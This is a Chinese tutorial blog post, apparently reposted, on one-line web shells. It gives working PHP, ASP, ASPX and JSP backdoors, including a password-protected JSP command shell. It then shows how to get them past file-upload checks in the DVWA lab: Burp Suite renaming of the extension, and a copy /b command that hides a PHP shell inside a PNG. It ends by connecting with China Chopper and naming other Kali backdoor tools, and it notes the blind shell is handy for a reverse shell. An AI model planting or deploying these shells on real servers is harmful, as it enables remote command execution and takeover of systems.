一句话木马
常用于php、asp、aspx
php
<?php echo shell_exec($_GET['cmd']);?>
asp
<%execute(request("value"))%>
aspx
<%@ Page Language="Jscript"%>
<%eval(Request.Item["value"])%>
jsp
无回显执行系统命令
<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>
请求:http://192.168.16.240:8080/Shell/cmd2.jsp?cmd=ls
执行之后不会有任何回显,用来反弹个shell很方便。
有回显带密码验证的
<%
if("123".equals(request.getParameter("pwd"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>
请求:http://192.168.16.240:8080/Shell/cmd2.jsp?pwd=123&cmd=ls /
上传文件
通过Burp Suite绕过前端验证文件格式,通过修改数据包通过后端检验。
安全级别Low
前后端没有任何验证
安全级别Medium
仅前端判断文件后缀名
当前端提示不能发送非jpg、png格式时,Burp Suite配置好Proxy -》 Options,并在Proxy-》Intercept-》Intercept is on,浏览器设置代理为Options中的配置
首先把shell.php后缀改为jpg,然后提交,在filename中把文件shell.jpg后缀改为shell.php
![](https://img2018.cnblogs.com/blog/1208477/201906/1208477-20190618172444330-1297386210.png)
安全级别High
准备一个图片和shell.php脚本,windows下运行
copy 1.png/b+shell.php/a shell.png
![](https://img2018.cnblogs.com/blog/1208477/201906/1208477-20190619104234741-410286571.png)
将图片上传后,使用中国菜刀连接(中国菜刀可以把图片当成php执行)
访问
这里以php的 <?php echo shell_exec($_GET['cmd']);?> 为例子
访问一句话木马文件(要知道上传的文件目录)
http://127.0.0.1/dvwa/hackable/uploads/shell.php?cmd=ls
php中的cmd是参数
![](https://img2018.cnblogs.com/blog/1208477/201906/1208477-20190618163843714-1467729053.png)
可以看到cmd参数为ls是直接查询当前目录下的文件
同样可以操作其他目录文件
![](https://img2018.cnblogs.com/blog/1208477/201906/1208477-20190618164039740-1971979379.png)
其他kali下的web后门工具
webacoo
仅适用于php
![](https://img2018.cnblogs.com/blog/1208477/201906/1208477-20190619105849608-1572545841.png)
weevely
仅适用于php
![](https://img2018.cnblogs.com/blog/1208477/201906/1208477-20190619105948271-1472074120.png)
参考
https://blog.csdn.net/weixin_39190897/article/details/86771918
转载于:https://www.cnblogs.com/aeolian/p/11041052.html
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)